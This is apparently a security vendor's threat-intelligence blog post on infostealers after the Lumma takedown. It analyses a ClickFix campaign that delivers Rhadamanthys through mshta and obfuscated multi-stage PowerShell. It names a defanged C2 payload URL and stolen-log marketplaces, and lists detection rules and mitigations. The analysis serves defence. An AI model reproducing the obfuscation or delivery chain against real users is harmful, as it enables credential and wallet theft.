Infostealer Watch: Will Lumma’s Takedown Help Rhadamanthys’ Rise?

Information stealer or ‘infostealer’ malware is used by threat actors to harvest login items, such as cookies, credentials, and session tokens, as well as cryptocurrency wallets and credit card information from victims. Then, they are typically packaged as ‘logs’ and sold in dark web marketplaces.

Ransomware, financial fraud, and corporate espionage are common follow-on activities leveraging this stolen data — which fuels an underground economy and poses substantial risks to organizations.

Lumma stealer was the undisputed leader in the infostealer category until yesterday when Microsoft identified almost 400,000 computers infected with the malware. A large law enforcement operation shut down more than 1,300 domains used as its command and control (C2).

This opens up two possibilities:

• The operators of Lumma stealer may rebuild their infrastructure and return. After a takedown, operators often want to avoid the spotlight, but it’s not uncommon for criminal infrastructure disrupted by law enforcement to return after some time. Emotet is one of the best examples.
• Other infostealers may take Lumma’s place, since there are several alternatives in underground markets. A big player, such as Formbook, could rise to the top or several smaller ones may share parts of this market.

Here, we give an overview on the history of infostealers, underscore the increasing risks posed by a ‘rising star,’ the Rhadamanthys infostealer, and discuss how threat actors distribute logs collected by several infostealers in the same forums. The actual infostealer malware is just a means to an end.

A Brief History of Infostealer Malware

Infostealer technology is not new. This type of malware is usually distributed as a service, sold via a monthly subscription that provides access to C2 servers.

Formbook, for instance, has been sold in various malware-as-a-service packages on hacking forums since 2016. By 2023, infostealers were already very common with established names, such as Raccoon, RedLine, and Vidar. But that year, we observed a rise in the popularity of more recent infostealers, such as Mystic, Aurora, Misha, and Titan.

Today, infostealers are a cornerstone of cybercrime — alongside RATs, botnets, ransomware, and C2 frameworks. In our 2024 Threat Roundup, we showed how infostealers became the most common malware type last year. We also reported on Lumma stealer becoming the most active infostealer.

ClickFix campaigns are now the most recent advancement in infostealer delivery. ClickFix, also called ClearFix, attacks involve social engineering end-users into copying and executing malicious commands (usually PowerShell) provided by the attacker. These campaigns have been observed since the second half of 2024 and have been gaining popularity in 2025.

Once delivered, infostealer malware often operates in stealth, running in the background and sending the stolen data to a remote server controlled by the attacker.

Lumma Stealer was being delivered via ClickFix attacks since at least September 2024, but we recently observed campaigns delivering another stealer via similar methods: Rhadamanthys.

ClickFix Delivery: Rhadamanthys Stealer

We have observed threat actors using ClickFix attacks to deliver the Rhadamanthys infostealer.

The attacks leveraged a combination of mshta.exe – a native executable that runs Microsoft HTML Application (HTA) script code – along with a malicious URL and an authentication code. This combination, shown below, ultimately leads to the delivery of the stealer.

To lure victims into executing this command, the attackers crafted targeted spearphishing emails with instructions for the user to follow under the guise of verification. Here is an example spearphishing e-mail and its verification steps:

Behind the scenes, an obfuscated malicious PowerShell script is executed for further delivery of the payload. The script has three stages.

First Stage

The observed command, shown in the figure below, begins by invoking the PowerShell executable with the -w 1 argument, which sets the window style to minimal. This means that the PowerShell window runs in the background without a user interface, making it invisible to the user.

Next, $adz is a variable assignment where the obfuscated data is processed:

• [text.encoding]::ascii.getbytes(...) converts a string of characters into ASCII bytes.
• sort-object { get-random -setseed 1966181726 }: The byte array is then randomly sorted using a fixed seed value. This makes the data appear scrambled, serving as a basic obfuscation technique to hide its true meaning.
• [text.encoding]::ascii.getstring(...): After sorting, the byte array is converted back into a string, which is now obfuscated and harder to interpret at first glance.

The final goal is to get to the next stage payload, which is also a PowerShell command.

Second Stage

The command is a Base64-encoded PowerShell script. The -e flag tells PowerShell to decode the encoded string and execute it as a script. The string (zgb1ag4aywb0agkabwbuacaacq…) is an obfuscated payload.

This PowerShell command uses two layers of obfuscation, First, it contains a Base64-encoded string, and then it decodes the result using UTF-32 format to reveal the actual command as shown below:

The next file downloaded in Stage 2 is approximately 10 MB in size and protected using the commercial obfuscator Agile.NET, which applies techniques such as entity renaming and control flow obfuscation.

After execution, it connects to the C2 server to download the final payload on https://bird[.]stone-apple-vine[.]pro/ukk6dd9hy825.bin

Final Payload

The downloaded payload is the Rhadamanthys stealer v0.7.0. The stealer harvests a wide range of sensitive data, including system information, credentials, browser passwords, cookies, and cryptocurrency wallet contents. Its data collection capabilities are extensive. They target both mainstream applications—such as Google Chrome—and niche software, such as the Pale Moon browser and Auvitas Wallet.

Upon infection, Rhadamanthys automatically exfiltrates harvested data to its C2 infrastructure while also enabling threat actors to deploy additional extensions or execute custom commands on compromised systems. What sets Rhadamanthys apart is its modular architecture allowing for continuous feature expansion and rapid adaptation. Its extensibility and frequent updates make it a highly effective tool in the cybercriminal arsenal.

Rhadamanthys has stage-based execution architecture:

• Stage 1 – Loader Initialization
  Rhadamanthys begins its execution by embedding and executing Stage 2 shellcode within the .textbss section of the host Portable Executable (PE) file. This stage is responsible for initializing the unpacking process and transitioning execution to the next phase.
• Stage 2 – System Preparation and C2 Communication
  In this stage, the malware prepares the infected environment by:
  • Getting machine and process information.
  • Performing process injection.
  • Unhooking security-related APIs.
  • Running evasion checks.
• Stage 3 – Data Theft and Exfiltration
  In the last stage, the stealer:
  • Collects browser credentials, system information, crypto wallet data.
  • Activates image/OCR-based modules for advanced data targeting.
  • Loads additional plug-ins (extensions).
  • Exfiltrates all gathered data to the C2 server.

Other notable features of the malware include:

• MSI-Based Payload Execution
  An upgrade in v0.7.0 is the ability to disguise and execute payloads as MSI (Microsoft Installer) files. This is done by:
  • Writing a malicious .msi to %LOCALAPPDATA%\Microsoft\.
  • Executing it using the ShellExecuteExW API.
• Mutex-Based Kill Switch
  To ensure only one active instance, Rhadamanthys creates uniquely formatted mutexes based on a SHA-1 hash of a hardcoded byte sequence.
• Re-Execution Delay Mechanism
  Rhadamanthys uses an encrypted timestamp stored in the Windows Registry to avoid re-executing within a set timeframe.

Lessons from Lumma Stealer: Log Distribution and TTPs

The figure below summarizes the evolution of Lumma Stealer from its inception until the takedown yesterday. This infostealer appeared at the end of 2022 but rapidly became the dominant player in this category. The malware now includes capabilities, such as AMSI bypass, process hollowing, code flow obfuscation, encrypted C2 communications, and persistence via registry modifications, as well as DLL sideloading.

Threat actors using the malware also evolved their distribution tactics from traditional cracked software to ClickFix campaigns employing various initial access techniques and multi-stage delivery chains, such as the one we presented above for Rhadamanthys.

These actors were leveraging multiple legitimate platforms for malware distribution including Google Drive, GitHub, X, YouTube and Telegram.

Stolen credentials were then distributed in markets such as BreachForums, cracking[.]org, hard-tm[.]su, nohide[.]space, darknetarmy[.]com, niflheim[.]world, nulledbb[.]com and Telegram channels such as https://t[.]me/+seHLUhOHbVhMDM0.

One actor we followed selling stolen credentials was DaisyCloud (and variations such as up-daisycloud, daisycloud, new-daisycloud). They have been selling Lumma logs since its inception two years ago, but were also observed selling Redline stealer logs. This sheds light on how distribution points are independent of the specific stealer.

We provided a deep technical analysis of Lumma on a dedicated Medium blog, including infrastructure and targeted applications. Below is a summary of infrastructure components and observed TTPs used by threat actors distributing Lumma Stealer until the takedown. These capabilities will likely be adapted to distribute other growing infostealers, such as Rhadamanthys in the near future.

Go deeper: See why Healthcare data breach information is so valuable – and why the industry is in critical condition in cybersecurity.

Conclusion and Mitigation Recommendations

Lumma Stealer and Rhadamanthys exemplify new advances in credential theft techniques from traditional delivery methods to multi-stage chains with social engineering tactics. Even after Lumma’s takedown, we don’t expect infostealers to become less popular with cybercriminals. Quite the contrary, we believe that future infostealer malware will continue to blend technical sophistication with social engineering components.

The sensitive data obtained by infostealers can lead to operational disruptions, data theft, and regulatory penalties to organizations in Financial Services, Healthcare and other critical sectors, as we discussed in a recent blog.

The evolving credential theft techniques discussed in this blog have far-reaching implications that must be addressed by organizations. Therefore, we recommend the following:

Beyond these recommendations, organizations should consider dedicated threat hunting for authentication threats. These hunts should focus on:

• Authentication attempts from anomalous geographic locations
• Bulk data transfers from authentication infrastructure
• Anomalous query patterns against LDAP directories
• Anomalous certificate validation requests
• Manipulation of certificate trust chains
• Access to certificate private keys
• Anomalous password reset activities
• Failed MFA attempts on privileged accounts
• Unauthorized token generation
• Access from unexpected client applications
• Anomalous permissions to service accounts
• Creation of unauthorized administrative users
• Modification of cloud tenant configurations
• Abnormal access to sensitive cloud resources

To defend against info stealers, the Forescout 4D Platform™ includes advanced capabilities designed to detect and block such malware through detection rules, threat intel and behavioral analysis:

• CY-IR-0028 EDR Telemetry: MSHTA Execution Anomaly Detection (UEBA)
• CY-IR-0497 EDR Telemetry: Suspicious Invoke-WebRequest Execution Detected
• CY-IR-0102 Endpoint Security: Anti-Malware Detection

Indicators of Compromise (IoCs)

Riskiest Devices Webinar: Explore the most up-to-date trends in device vulnerabilities on-demand.